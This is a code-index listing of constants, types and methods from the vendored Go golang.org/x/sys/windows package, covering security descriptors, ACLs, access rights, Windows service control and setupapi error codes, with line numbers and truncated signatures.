constant WTSInit (line 873) | WTSInit = 9 type WTSSESSION_NOTIFICATION (line 876) | type WTSSESSION_NOTIFICATION struct type WTS_SESSION_INFO (line 881) | type WTS_SESSION_INFO struct type ACL (line 892) | type ACL struct type SECURITY_DESCRIPTOR (line 900) | type SECURITY_DESCRIPTOR struct method Control (line 1162) | func (sd *SECURITY_DESCRIPTOR) Control() (control SECURITY_DESCRIPTOR_... method SetControl (line 1168) | func (sd *SECURITY_DESCRIPTOR) SetControl(controlBitsOfInterest SECURI... method RMControl (line 1173) | func (sd *SECURITY_DESCRIPTOR) RMControl() (control uint8, err error) { method SetRMControl (line 1179) | func (sd *SECURITY_DESCRIPTOR) SetRMControl(rmControl uint8) { method DACL (line 1186) | func (sd *SECURITY_DESCRIPTOR) DACL() (dacl *ACL, defaulted bool, err ... method SetDACL (line 1196) | func (absoluteSD *SECURITY_DESCRIPTOR) SetDACL(dacl *ACL, present, def... method SACL (line 1203) | func (sd *SECURITY_DESCRIPTOR) SACL() (sacl *ACL, defaulted bool, err ... method SetSACL (line 1213) | func (absoluteSD *SECURITY_DESCRIPTOR) SetSACL(sacl *ACL, present, def... method Owner (line 1218) | func (sd *SECURITY_DESCRIPTOR) Owner() (owner *SID, defaulted bool, er... method SetOwner (line 1224) | func (absoluteSD *SECURITY_DESCRIPTOR) SetOwner(owner *SID, defaulted ... method Group (line 1229) | func (sd *SECURITY_DESCRIPTOR) Group() (group *SID, defaulted bool, er... method SetGroup (line 1235) | func (absoluteSD *SECURITY_DESCRIPTOR) SetGroup(group *SID, defaulted ... method Length (line 1240) | func (sd *SECURITY_DESCRIPTOR) Length() uint32 { method IsValid (line 1245) | func (sd *SECURITY_DESCRIPTOR) IsValid() bool { method String (line 1251) | func (sd *SECURITY_DESCRIPTOR) String() string { method ToAbsolute (line 1262) | func (selfRelativeSD *SECURITY_DESCRIPTOR) ToAbsolute() (absoluteSD *S... method ToSelfRelative (line 1309) | func (absoluteSD *SECURITY_DESCRIPTOR) ToSelfRelative() (selfRelativeS... method copySelfRelativeSecurityDescriptor (line 1335) | func (selfRelativeSD *SECURITY_DESCRIPTOR) copySelfRelativeSecurityDes... type SECURITY_QUALITY_OF_SERVICE (line 910) | type SECURITY_QUALITY_OF_SERVICE struct constant SECURITY_STATIC_TRACKING (line 919) | SECURITY_STATIC_TRACKING = 0 constant SECURITY_DYNAMIC_TRACKING (line 920) | SECURITY_DYNAMIC_TRACKING = 1 type SecurityAttributes (line 923) | type SecurityAttributes struct type SE_OBJECT_TYPE (line 929) | type SE_OBJECT_TYPE constant SE_UNKNOWN_OBJECT_TYPE (line 933) | SE_UNKNOWN_OBJECT_TYPE = 0 constant SE_FILE_OBJECT (line 934) | SE_FILE_OBJECT = 1 constant SE_SERVICE (line 935) | SE_SERVICE = 2 constant SE_PRINTER (line 936) | SE_PRINTER = 3 constant SE_REGISTRY_KEY (line 937) | SE_REGISTRY_KEY = 4 constant SE_LMSHARE (line 938) | SE_LMSHARE = 5 constant SE_KERNEL_OBJECT (line 939) | SE_KERNEL_OBJECT = 6 constant SE_WINDOW_OBJECT (line 940) | SE_WINDOW_OBJECT = 7 constant SE_DS_OBJECT (line 941) | SE_DS_OBJECT = 8 constant SE_DS_OBJECT_ALL (line 942) | SE_DS_OBJECT_ALL = 9 constant SE_PROVIDER_DEFINED_OBJECT (line 943) | SE_PROVIDER_DEFINED_OBJECT = 10 constant SE_WMIGUID_OBJECT (line 944) | SE_WMIGUID_OBJECT = 11 constant SE_REGISTRY_WOW64_32KEY (line 945) | SE_REGISTRY_WOW64_32KEY = 12 constant SE_REGISTRY_WOW64_64KEY (line 946) | SE_REGISTRY_WOW64_64KEY = 13 type SECURITY_INFORMATION (line 949) | type SECURITY_INFORMATION constant OWNER_SECURITY_INFORMATION (line 953) | OWNER_SECURITY_INFORMATION = 0x00000001 constant GROUP_SECURITY_INFORMATION (line 954) | GROUP_SECURITY_INFORMATION = 0x00000002 constant DACL_SECURITY_INFORMATION (line 955) | DACL_SECURITY_INFORMATION = 0x00000004 constant SACL_SECURITY_INFORMATION (line 956) | SACL_SECURITY_INFORMATION = 0x00000008 constant LABEL_SECURITY_INFORMATION (line 957) | LABEL_SECURITY_INFORMATION = 0x00000010 constant ATTRIBUTE_SECURITY_INFORMATION (line 958) | ATTRIBUTE_SECURITY_INFORMATION = 0x00000020 constant SCOPE_SECURITY_INFORMATION (line 959) | SCOPE_SECURITY_INFORMATION = 0x00000040 constant BACKUP_SECURITY_INFORMATION (line 960) | BACKUP_SECURITY_INFORMATION = 0x00010000 constant PROTECTED_DACL_SECURITY_INFORMATION (line 961) | PROTECTED_DACL_SECURITY_INFORMATION = 0x80000000 constant PROTECTED_SACL_SECURITY_INFORMATION (line 962) | PROTECTED_SACL_SECURITY_INFORMATION = 0x40000000 constant UNPROTECTED_DACL_SECURITY_INFORMATION (line 963) | UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000 constant UNPROTECTED_SACL_SECURITY_INFORMATION (line 964) | UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000 type SECURITY_DESCRIPTOR_CONTROL (line 967) | type SECURITY_DESCRIPTOR_CONTROL constant SE_OWNER_DEFAULTED (line 971) | SE_OWNER_DEFAULTED = 0x0001 constant SE_GROUP_DEFAULTED (line 972) | SE_GROUP_DEFAULTED = 0x0002 constant SE_DACL_PRESENT (line 973) | SE_DACL_PRESENT = 0x0004 constant SE_DACL_DEFAULTED (line 974) | SE_DACL_DEFAULTED = 0x0008 constant SE_SACL_PRESENT (line 975) | SE_SACL_PRESENT = 0x0010 constant SE_SACL_DEFAULTED (line 976) | SE_SACL_DEFAULTED = 0x0020 constant SE_DACL_AUTO_INHERIT_REQ (line 977) | SE_DACL_AUTO_INHERIT_REQ = 0x0100 constant SE_SACL_AUTO_INHERIT_REQ (line 978) | SE_SACL_AUTO_INHERIT_REQ = 0x0200 constant SE_DACL_AUTO_INHERITED (line 979) | SE_DACL_AUTO_INHERITED = 0x0400 constant SE_SACL_AUTO_INHERITED (line 980) | SE_SACL_AUTO_INHERITED = 0x0800 constant SE_DACL_PROTECTED (line 981) | SE_DACL_PROTECTED = 0x1000 constant SE_SACL_PROTECTED (line 982) | SE_SACL_PROTECTED = 0x2000 constant SE_RM_CONTROL_VALID (line 983) | SE_RM_CONTROL_VALID = 0x4000 constant SE_SELF_RELATIVE (line 984) | SE_SELF_RELATIVE = 0x8000 type ACCESS_MASK (line 987) | type ACCESS_MASK constant DELETE (line 991) | DELETE = 0x00010000 constant READ_CONTROL (line 992) | READ_CONTROL = 0x00020000 constant WRITE_DAC (line 993) | WRITE_DAC = 0x00040000 constant WRITE_OWNER (line 994) | WRITE_OWNER = 0x00080000 constant SYNCHRONIZE (line 995) | SYNCHRONIZE = 0x00100000 constant STANDARD_RIGHTS_REQUIRED (line 996) | STANDARD_RIGHTS_REQUIRED = 0x000F0000 constant STANDARD_RIGHTS_READ (line 997) | STANDARD_RIGHTS_READ = READ_CONTROL constant STANDARD_RIGHTS_WRITE (line 998) | STANDARD_RIGHTS_WRITE = READ_CONTROL constant STANDARD_RIGHTS_EXECUTE (line 999) | STANDARD_RIGHTS_EXECUTE = READ_CONTROL constant STANDARD_RIGHTS_ALL (line 1000) | STANDARD_RIGHTS_ALL = 0x001F0000 constant SPECIFIC_RIGHTS_ALL (line 1001) | SPECIFIC_RIGHTS_ALL = 0x0000FFFF constant ACCESS_SYSTEM_SECURITY (line 1002) | ACCESS_SYSTEM_SECURITY = 0x01000000 constant MAXIMUM_ALLOWED (line 1003) | MAXIMUM_ALLOWED = 0x02000000 constant GENERIC_READ (line 1004) | GENERIC_READ = 0x80000000 constant GENERIC_WRITE (line 1005) | GENERIC_WRITE = 0x40000000 constant GENERIC_EXECUTE (line 1006) | GENERIC_EXECUTE = 0x20000000 constant GENERIC_ALL (line 1007) | GENERIC_ALL = 0x10000000 type ACCESS_MODE (line 1010) | type ACCESS_MODE constant NOT_USED_ACCESS (line 1014) | NOT_USED_ACCESS = 0 constant GRANT_ACCESS (line 1015) | GRANT_ACCESS = 1 constant SET_ACCESS (line 1016) | SET_ACCESS = 2 constant DENY_ACCESS (line 1017) | DENY_ACCESS = 3 constant REVOKE_ACCESS (line 1018) | REVOKE_ACCESS = 4 constant SET_AUDIT_SUCCESS (line 1019) | SET_AUDIT_SUCCESS = 5 constant SET_AUDIT_FAILURE (line 1020) | SET_AUDIT_FAILURE = 6 constant NO_INHERITANCE (line 1025) | NO_INHERITANCE = 0x0 constant SUB_OBJECTS_ONLY_INHERIT (line 1026) | SUB_OBJECTS_ONLY_INHERIT = 0x1 constant SUB_CONTAINERS_ONLY_INHERIT (line 1027) | SUB_CONTAINERS_ONLY_INHERIT = 0x2 constant SUB_CONTAINERS_AND_OBJECTS_INHERIT (line 1028) | SUB_CONTAINERS_AND_OBJECTS_INHERIT = 0x3 constant INHERIT_NO_PROPAGATE (line 1029) | INHERIT_NO_PROPAGATE = 0x4 constant INHERIT_ONLY (line 1030) | INHERIT_ONLY = 0x8 constant INHERITED_ACCESS_ENTRY (line 1031) | INHERITED_ACCESS_ENTRY = 0x10 constant INHERITED_PARENT (line 1032) | INHERITED_PARENT = 0x10000000 constant INHERITED_GRANDPARENT (line 1033) | INHERITED_GRANDPARENT = 0x20000000 constant OBJECT_INHERIT_ACE (line 1034) | OBJECT_INHERIT_ACE = 0x1 constant CONTAINER_INHERIT_ACE (line 1035) | CONTAINER_INHERIT_ACE = 0x2 constant NO_PROPAGATE_INHERIT_ACE (line 1036) | NO_PROPAGATE_INHERIT_ACE = 0x4 constant INHERIT_ONLY_ACE (line 1037) | INHERIT_ONLY_ACE = 0x8 constant INHERITED_ACE (line 1038) | INHERITED_ACE = 0x10 constant VALID_INHERIT_FLAGS (line 1039) | VALID_INHERIT_FLAGS = 0x1F type MULTIPLE_TRUSTEE_OPERATION (line 1042) | type MULTIPLE_TRUSTEE_OPERATION constant NO_MULTIPLE_TRUSTEE (line 1046) | NO_MULTIPLE_TRUSTEE = 0 constant TRUSTEE_IS_IMPERSONATE (line 1047) | TRUSTEE_IS_IMPERSONATE = 1 type TRUSTEE_FORM (line 1050) | type TRUSTEE_FORM constant TRUSTEE_IS_SID (line 1054) | TRUSTEE_IS_SID = 0 constant TRUSTEE_IS_NAME (line 1055) | TRUSTEE_IS_NAME = 1 constant TRUSTEE_BAD_FORM (line 1056) | TRUSTEE_BAD_FORM = 2 constant TRUSTEE_IS_OBJECTS_AND_SID (line 1057) | TRUSTEE_IS_OBJECTS_AND_SID = 3 constant TRUSTEE_IS_OBJECTS_AND_NAME (line 1058) | TRUSTEE_IS_OBJECTS_AND_NAME = 4 type TRUSTEE_TYPE (line 1061) | type TRUSTEE_TYPE constant TRUSTEE_IS_UNKNOWN (line 1065) | TRUSTEE_IS_UNKNOWN = 0 constant TRUSTEE_IS_USER (line 1066) | TRUSTEE_IS_USER = 1 constant TRUSTEE_IS_GROUP (line 1067) | TRUSTEE_IS_GROUP = 2 constant TRUSTEE_IS_DOMAIN (line 1068) | TRUSTEE_IS_DOMAIN = 3 constant TRUSTEE_IS_ALIAS (line 1069) | TRUSTEE_IS_ALIAS = 4 constant TRUSTEE_IS_WELL_KNOWN_GROUP (line 1070) | TRUSTEE_IS_WELL_KNOWN_GROUP = 5 constant TRUSTEE_IS_DELETED (line 1071) | TRUSTEE_IS_DELETED = 6 constant TRUSTEE_IS_INVALID (line 1072) | TRUSTEE_IS_INVALID = 7 constant TRUSTEE_IS_COMPUTER (line 1073) | TRUSTEE_IS_COMPUTER = 8 constant ACE_OBJECT_TYPE_PRESENT (line 1078) | ACE_OBJECT_TYPE_PRESENT = 0x1 constant ACE_INHERITED_OBJECT_TYPE_PRESENT (line 1079) | ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x2 type EXPLICIT_ACCESS (line 1082) | type EXPLICIT_ACCESS struct type TrusteeValue (line 1090) | type TrusteeValue function TrusteeValueFromString (line 1092) | func TrusteeValueFromString(str string) TrusteeValue { function TrusteeValueFromSID (line 1095) | func TrusteeValueFromSID(sid *SID) TrusteeValue { function TrusteeValueFromObjectsAndSid (line 1098) | func TrusteeValueFromObjectsAndSid(objectsAndSid *OBJECTS_AND_SID) Trust... function TrusteeValueFromObjectsAndName (line 1101) | func TrusteeValueFromObjectsAndName(objectsAndName *OBJECTS_AND_NAME) Tr... type TRUSTEE (line 1105) | type TRUSTEE struct type OBJECTS_AND_SID (line 1113) | type OBJECTS_AND_SID struct type OBJECTS_AND_NAME (line 1120) | type OBJECTS_AND_NAME struct function SecurityDescriptorFromString (line 1356) | func SecurityDescriptorFromString(sddl string) (sd *SECURITY_DESCRIPTOR,... function GetSecurityInfo (line 1368) | func GetSecurityInfo(handle Handle, objectType SE_OBJECT_TYPE, securityI... function GetNamedSecurityInfo (line 1380) | func GetNamedSecurityInfo(objectName string, objectType SE_OBJECT_TYPE, ... function BuildSecurityDescriptor (line 1393) | func BuildSecurityDescriptor(owner *TRUSTEE, group *TRUSTEE, accessEntri... function NewSecurityDescriptor (line 1413) | func NewSecurityDescriptor() (absoluteSD *SECURITY_DESCRIPTOR, err error) { function ACLFromEntries (line 1421) | func ACLFromEntries(explicitEntries []EXPLICIT_ACCESS, mergedACL *ACL) (... FILE: vendor/golang.org/x/sys/windows/service.go constant SC_MANAGER_CONNECT (line 10) | SC_MANAGER_CONNECT = 1 constant SC_MANAGER_CREATE_SERVICE (line 11) | SC_MANAGER_CREATE_SERVICE = 2 constant SC_MANAGER_ENUMERATE_SERVICE (line 12) | SC_MANAGER_ENUMERATE_SERVICE = 4 constant SC_MANAGER_LOCK (line 13) | SC_MANAGER_LOCK = 8 constant SC_MANAGER_QUERY_LOCK_STATUS (line 14) | SC_MANAGER_QUERY_LOCK_STATUS = 16 constant SC_MANAGER_MODIFY_BOOT_CONFIG (line 15) | SC_MANAGER_MODIFY_BOOT_CONFIG = 32 constant SC_MANAGER_ALL_ACCESS (line 16) | SC_MANAGER_ALL_ACCESS = 0xf003f constant SERVICE_KERNEL_DRIVER (line 20) | SERVICE_KERNEL_DRIVER = 1 constant SERVICE_FILE_SYSTEM_DRIVER (line 21) | SERVICE_FILE_SYSTEM_DRIVER = 2 constant SERVICE_ADAPTER (line 22) | SERVICE_ADAPTER = 4 constant SERVICE_RECOGNIZER_DRIVER (line 23) | SERVICE_RECOGNIZER_DRIVER = 8 constant SERVICE_WIN32_OWN_PROCESS (line 24) | SERVICE_WIN32_OWN_PROCESS = 16 constant SERVICE_WIN32_SHARE_PROCESS (line 25) | SERVICE_WIN32_SHARE_PROCESS = 32 constant SERVICE_WIN32 (line 26) | SERVICE_WIN32 = SERVICE_WIN32_OWN_PROCESS | SERVICE_WIN32_... constant SERVICE_INTERACTIVE_PROCESS (line 27) | SERVICE_INTERACTIVE_PROCESS = 256 constant SERVICE_DRIVER (line 28) | SERVICE_DRIVER = SERVICE_KERNEL_DRIVER | SERVICE_FILE_SYSTE... constant SERVICE_TYPE_ALL (line 29) | SERVICE_TYPE_ALL = SERVICE_WIN32 | SERVICE_ADAPTER | SERVICE_... constant SERVICE_BOOT_START (line 31) | SERVICE_BOOT_START = 0 constant SERVICE_SYSTEM_START (line 32) | SERVICE_SYSTEM_START = 1 constant SERVICE_AUTO_START (line 33) | SERVICE_AUTO_START = 2 constant SERVICE_DEMAND_START (line 34) | SERVICE_DEMAND_START = 3 constant SERVICE_DISABLED (line 35) | SERVICE_DISABLED = 4 constant SERVICE_ERROR_IGNORE (line 37) | SERVICE_ERROR_IGNORE = 0 constant SERVICE_ERROR_NORMAL (line 38) | SERVICE_ERROR_NORMAL = 1 constant SERVICE_ERROR_SEVERE (line 39) | SERVICE_ERROR_SEVERE = 2 constant SERVICE_ERROR_CRITICAL (line 40) | SERVICE_ERROR_CRITICAL = 3 constant SC_STATUS_PROCESS_INFO (line 42) | SC_STATUS_PROCESS_INFO = 0 constant SC_ACTION_NONE (line 44) | SC_ACTION_NONE = 0 constant SC_ACTION_RESTART (line 45) | SC_ACTION_RESTART = 1 constant SC_ACTION_REBOOT (line 46) | SC_ACTION_REBOOT = 2 constant SC_ACTION_RUN_COMMAND (line 47) | SC_ACTION_RUN_COMMAND = 3 constant SERVICE_STOPPED (line 49) | SERVICE_STOPPED = 1 constant SERVICE_START_PENDING (line 50) | SERVICE_START_PENDING = 2 constant SERVICE_STOP_PENDING (line 51) | SERVICE_STOP_PENDING = 3 constant SERVICE_RUNNING (line 52) | SERVICE_RUNNING = 4 constant SERVICE_CONTINUE_PENDING (line 53) | SERVICE_CONTINUE_PENDING = 5 constant SERVICE_PAUSE_PENDING (line 54) | SERVICE_PAUSE_PENDING = 6 constant SERVICE_PAUSED (line 55) | SERVICE_PAUSED = 7 constant SERVICE_NO_CHANGE (line 56) | SERVICE_NO_CHANGE = 0xffffffff constant SERVICE_ACCEPT_STOP (line 58) | SERVICE_ACCEPT_STOP = 1 constant SERVICE_ACCEPT_PAUSE_CONTINUE (line 59) | SERVICE_ACCEPT_PAUSE_CONTINUE = 2 constant SERVICE_ACCEPT_SHUTDOWN (line 60) | SERVICE_ACCEPT_SHUTDOWN = 4 constant SERVICE_ACCEPT_PARAMCHANGE (line 61) | SERVICE_ACCEPT_PARAMCHANGE = 8 constant SERVICE_ACCEPT_NETBINDCHANGE (line 62) | SERVICE_ACCEPT_NETBINDCHANGE = 16 constant SERVICE_ACCEPT_HARDWAREPROFILECHANGE (line 63) | SERVICE_ACCEPT_HARDWAREPROFILECHANGE = 32 constant SERVICE_ACCEPT_POWEREVENT (line 64) | SERVICE_ACCEPT_POWEREVENT = 64 constant SERVICE_ACCEPT_SESSIONCHANGE (line 65) | SERVICE_ACCEPT_SESSIONCHANGE = 128 constant SERVICE_ACCEPT_PRESHUTDOWN (line 66) | SERVICE_ACCEPT_PRESHUTDOWN = 256 constant SERVICE_CONTROL_STOP (line 68) | SERVICE_CONTROL_STOP = 1 constant SERVICE_CONTROL_PAUSE (line 69) | SERVICE_CONTROL_PAUSE = 2 constant SERVICE_CONTROL_CONTINUE (line 70) | SERVICE_CONTROL_CONTINUE = 3 constant SERVICE_CONTROL_INTERROGATE (line 71) | SERVICE_CONTROL_INTERROGATE = 4 constant SERVICE_CONTROL_SHUTDOWN (line 72) | SERVICE_CONTROL_SHUTDOWN = 5 constant SERVICE_CONTROL_PARAMCHANGE (line 73) | SERVICE_CONTROL_PARAMCHANGE = 6 constant SERVICE_CONTROL_NETBINDADD (line 74) | SERVICE_CONTROL_NETBINDADD = 7 constant SERVICE_CONTROL_NETBINDREMOVE (line 75) | SERVICE_CONTROL_NETBINDREMOVE = 8 constant SERVICE_CONTROL_NETBINDENABLE (line 76) | SERVICE_CONTROL_NETBINDENABLE = 9 constant SERVICE_CONTROL_NETBINDDISABLE (line 77) | SERVICE_CONTROL_NETBINDDISABLE = 10 constant SERVICE_CONTROL_DEVICEEVENT (line 78) | SERVICE_CONTROL_DEVICEEVENT = 11 constant SERVICE_CONTROL_HARDWAREPROFILECHANGE (line 79) | SERVICE_CONTROL_HARDWAREPROFILECHANGE = 12 constant SERVICE_CONTROL_POWEREVENT (line 80) | SERVICE_CONTROL_POWEREVENT = 13 constant SERVICE_CONTROL_SESSIONCHANGE (line 81) | SERVICE_CONTROL_SESSIONCHANGE = 14 constant SERVICE_CONTROL_PRESHUTDOWN (line 82) | SERVICE_CONTROL_PRESHUTDOWN = 15 constant SERVICE_ACTIVE (line 84) | SERVICE_ACTIVE = 1 constant SERVICE_INACTIVE (line 85) | SERVICE_INACTIVE = 2 constant SERVICE_STATE_ALL (line 86) | SERVICE_STATE_ALL = 3 constant SERVICE_QUERY_CONFIG (line 88) | SERVICE_QUERY_CONFIG = 1 constant SERVICE_CHANGE_CONFIG (line 89) | SERVICE_CHANGE_CONFIG = 2 constant SERVICE_QUERY_STATUS (line 90) | SERVICE_QUERY_STATUS = 4 constant SERVICE_ENUMERATE_DEPENDENTS (line 91) | SERVICE_ENUMERATE_DEPENDENTS = 8 constant SERVICE_START (line 92) | SERVICE_START = 16 constant SERVICE_STOP (line 93) | SERVICE_STOP = 32 constant SERVICE_PAUSE_CONTINUE (line 94) | SERVICE_PAUSE_CONTINUE = 64 constant SERVICE_INTERROGATE (line 95) | SERVICE_INTERROGATE = 128 constant SERVICE_USER_DEFINED_CONTROL (line 96) | SERVICE_USER_DEFINED_CONTROL = 256 constant SERVICE_ALL_ACCESS (line 97) | SERVICE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SERVICE_QUERY_... constant SERVICE_RUNS_IN_SYSTEM_PROCESS (line 99) | SERVICE_RUNS_IN_SYSTEM_PROCESS = 1 constant SERVICE_CONFIG_DESCRIPTION (line 101) | SERVICE_CONFIG_DESCRIPTION = 1 constant SERVICE_CONFIG_FAILURE_ACTIONS (line 102) | SERVICE_CONFIG_FAILURE_ACTIONS = 2 constant SERVICE_CONFIG_DELAYED_AUTO_START_INFO (line 103) | SERVICE_CONFIG_DELAYED_AUTO_START_INFO = 3 constant SERVICE_CONFIG_FAILURE_ACTIONS_FLAG (line 104) | SERVICE_CONFIG_FAILURE_ACTIONS_FLAG = 4 constant SERVICE_CONFIG_SERVICE_SID_INFO (line 105) | SERVICE_CONFIG_SERVICE_SID_INFO = 5 constant SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO (line 106) | SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO = 6 constant SERVICE_CONFIG_PRESHUTDOWN_INFO (line 107) | SERVICE_CONFIG_PRESHUTDOWN_INFO = 7 constant SERVICE_CONFIG_TRIGGER_INFO (line 108) | SERVICE_CONFIG_TRIGGER_INFO = 8 constant SERVICE_CONFIG_PREFERRED_NODE (line 109) | SERVICE_CONFIG_PREFERRED_NODE = 9 constant SERVICE_CONFIG_LAUNCH_PROTECTED (line 110) | SERVICE_CONFIG_LAUNCH_PROTECTED = 12 constant SERVICE_SID_TYPE_NONE (line 112) | SERVICE_SID_TYPE_NONE = 0 constant SERVICE_SID_TYPE_UNRESTRICTED (line 113) | SERVICE_SID_TYPE_UNRESTRICTED = 1 constant SERVICE_SID_TYPE_RESTRICTED (line 114) | SERVICE_SID_TYPE_RESTRICTED = 2 | SERVICE_SID_TYPE_UNRESTRICTED constant SC_ENUM_PROCESS_INFO (line 116) | SC_ENUM_PROCESS_INFO = 0 constant SERVICE_NOTIFY_STATUS_CHANGE (line 118) | SERVICE_NOTIFY_STATUS_CHANGE = 2 constant SERVICE_NOTIFY_STOPPED (line 119) | SERVICE_NOTIFY_STOPPED = 0x00000001 constant SERVICE_NOTIFY_START_PENDING (line 120) | SERVICE_NOTIFY_START_PENDING = 0x00000002 constant SERVICE_NOTIFY_STOP_PENDING (line 121) | SERVICE_NOTIFY_STOP_PENDING = 0x00000004 constant SERVICE_NOTIFY_RUNNING (line 122) | SERVICE_NOTIFY_RUNNING = 0x00000008 constant SERVICE_NOTIFY_CONTINUE_PENDING (line 123) | SERVICE_NOTIFY_CONTINUE_PENDING = 0x00000010 constant SERVICE_NOTIFY_PAUSE_PENDING (line 124) | SERVICE_NOTIFY_PAUSE_PENDING = 0x00000020 constant SERVICE_NOTIFY_PAUSED (line 125) | SERVICE_NOTIFY_PAUSED = 0x00000040 constant SERVICE_NOTIFY_CREATED (line 126) | SERVICE_NOTIFY_CREATED = 0x00000080 constant SERVICE_NOTIFY_DELETED (line 127) | SERVICE_NOTIFY_DELETED = 0x00000100 constant SERVICE_NOTIFY_DELETE_PENDING (line 128) | SERVICE_NOTIFY_DELETE_PENDING = 0x00000200 constant SC_EVENT_DATABASE_CHANGE (line 130) | SC_EVENT_DATABASE_CHANGE = 0 constant SC_EVENT_PROPERTY_CHANGE (line 131) | SC_EVENT_PROPERTY_CHANGE = 1 constant SC_EVENT_STATUS_CHANGE (line 132) | SC_EVENT_STATUS_CHANGE = 2 constant SERVICE_START_REASON_DEMAND (line 134) | SERVICE_START_REASON_DEMAND = 0x00000001 constant SERVICE_START_REASON_AUTO (line 135) | SERVICE_START_REASON_AUTO = 0x00000002 constant SERVICE_START_REASON_TRIGGER (line 136) | SERVICE_START_REASON_TRIGGER = 0x00000004 constant SERVICE_START_REASON_RESTART_ON_FAILURE (line 137) | SERVICE_START_REASON_RESTART_ON_FAILURE = 0x00000008 constant SERVICE_START_REASON_DELAYEDAUTO (line 138) | SERVICE_START_REASON_DELAYEDAUTO = 0x00000010 constant SERVICE_DYNAMIC_INFORMATION_LEVEL_START_REASON (line 140) | SERVICE_DYNAMIC_INFORMATION_LEVEL_START_REASON = 1 type ENUM_SERVICE_STATUS (line 143) | type ENUM_SERVICE_STATUS struct type SERVICE_STATUS (line 149) | type SERVICE_STATUS struct type SERVICE_TABLE_ENTRY (line 159) | type SERVICE_TABLE_ENTRY struct type QUERY_SERVICE_CONFIG (line 164) | type QUERY_SERVICE_CONFIG struct type SERVICE_DESCRIPTION (line 176) | type SERVICE_DESCRIPTION struct type SERVICE_DELAYED_AUTO_START_INFO (line 180) | type SERVICE_DELAYED_AUTO_START_INFO struct type SERVICE_STATUS_PROCESS (line 184) | type SERVICE_STATUS_PROCESS struct type ENUM_SERVICE_STATUS_PROCESS (line 196) | type ENUM_SERVICE_STATUS_PROCESS struct type SERVICE_NOTIFY (line 202) | type SERVICE_NOTIFY struct type SERVICE_FAILURE_ACTIONS (line 212) | type SERVICE_FAILURE_ACTIONS struct type SERVICE_FAILURE_ACTIONS_FLAG (line 220) | type SERVICE_FAILURE_ACTIONS_FLAG struct type SC_ACTION (line 224) | type SC_ACTION struct type QUERY_SERVICE_LOCK_STATUS (line 229) | type QUERY_SERVICE_LOCK_STATUS struct FILE: vendor/golang.org/x/sys/windows/setupapi_windows.go constant ERROR_EXPECTED_SECTION_NAME (line 24) | ERROR_EXPECTED_SECTION_NAME Errno = 0x20000000 | 0xC000... constant ERROR_BAD_SECTION_NAME_LINE (line 25) | ERROR_BAD_SECTION_NAME_LINE Errno = 0x20000000 | 0xC000... constant ERROR_SECTION_NAME_TOO_LONG (line 26) | ERROR_SECTION_NAME_TOO_LONG Errno = 0x20000000 | 0xC000... constant ERROR_GENERAL_SYNTAX (line 27) | ERROR_GENERAL_SYNTAX Errno = 0x20000000 | 0xC000... constant ERROR_WRONG_INF_STYLE (line 28) | ERROR_WRONG_INF_STYLE Errno = 0x20000000 | 0xC000... constant ERROR_SECTION_NOT_FOUND (line 29) | ERROR_SECTION_NOT_FOUND Errno = 0x20000000 | 0xC000... constant ERROR_LINE_NOT_FOUND (line 30) | ERROR_LINE_NOT_FOUND Errno = 0x20000000 | 0xC000... constant ERROR_NO_BACKUP (line 31) | ERROR_NO_BACKUP Errno = 0x20000000 | 0xC000... constant ERROR_NO_ASSOCIATED_CLASS (line 32) | ERROR_NO_ASSOCIATED_CLASS Errno = 0x20000000 | 0xC000... constant ERROR_CLASS_MISMATCH (line 33) | ERROR_CLASS_MISMATCH Errno = 0x20000000 | 0xC000... constant ERROR_DUPLICATE_FOUND (line 34) | ERROR_DUPLICATE_FOUND Errno = 0x20000000 | 0xC000... constant ERROR_NO_DRIVER_SELECTED (line 35) | ERROR_NO_DRIVER_SELECTED Errno = 0x20000000 | 0xC000... constant ERROR_KEY_DOES_NOT_EXIST (line 36) | ERROR_KEY_DOES_NOT_EXIST Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_DEVINST_NAME (line 37) | ERROR_INVALID_DEVINST_NAME Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_CLASS (line 38) | ERROR_INVALID_CLASS Errno = 0x20000000 | 0xC000... constant ERROR_DEVINST_ALREADY_EXISTS (line 39) | ERROR_DEVINST_ALREADY_EXISTS Errno = 0x20000000 | 0xC000... constant ERROR_DEVINFO_NOT_REGISTERED (line 40) | ERROR_DEVINFO_NOT_REGISTERED Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_REG_PROPERTY (line 41) | ERROR_INVALID_REG_PROPERTY Errno = 0x20000000 | 0xC000... constant ERROR_NO_INF (line 42) | ERROR_NO_INF Errno = 0x20000000 | 0xC000... constant ERROR_NO_SUCH_DEVINST (line 43) | ERROR_NO_SUCH_DEVINST Errno = 0x20000000 | 0xC000... constant ERROR_CANT_LOAD_CLASS_ICON (line 44) | ERROR_CANT_LOAD_CLASS_ICON Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_CLASS_INSTALLER (line 45) | ERROR_INVALID_CLASS_INSTALLER Errno = 0x20000000 | 0xC000... constant ERROR_DI_DO_DEFAULT (line 46) | ERROR_DI_DO_DEFAULT Errno = 0x20000000 | 0xC000... constant ERROR_DI_NOFILECOPY (line 47) | ERROR_DI_NOFILECOPY Errno = 0x20000000 | 0xC000... constant ERROR_INVALID_HWPROFILE (line 48) | ERROR_INVALID_HWPROFILE Errno = 0x20000000 | 0xC000... constant ERROR_NO_DEVICE_SELECTED (line 49) | ERROR_NO_DEVICE_SELECTED Errno = 0x20000000 | 0xC000... constant ERROR_DEVINFO_LIST_LOCKED (line 50) | ERROR_DEVINFO_LIST_LOCKED Errno = 0x20000000 | 0xC000... constant ERROR_DEVINFO_DATA_LOCKED (line 51) | ERROR_DEVINFO_DATA_LOCKED Errno = 0x20000000 | 0xC000... constant ERROR_DI_BAD_PATH (line 52) | ERROR_DI_BAD_PATH Errno = 0x20000000 | 0xC000... constant ERROR_NO_CLASSINSTALL_PARAMS (line 53) | ERROR_NO_CLASSINSTALL_PARAMS Errno = 0x20000000 | 0xC000... constant ERROR_FILEQUEUE_LOCKED (line 54) | ERROR_FILEQUEUE_LOCKED Errno = 0x20000000 | 0xC000... constant ERROR_BAD_SERVICE_INSTALLSECT (line 55) | ERROR_BAD_SERVICE_INSTALLSECT Errno = 0x20000000 | 0xC000... constant 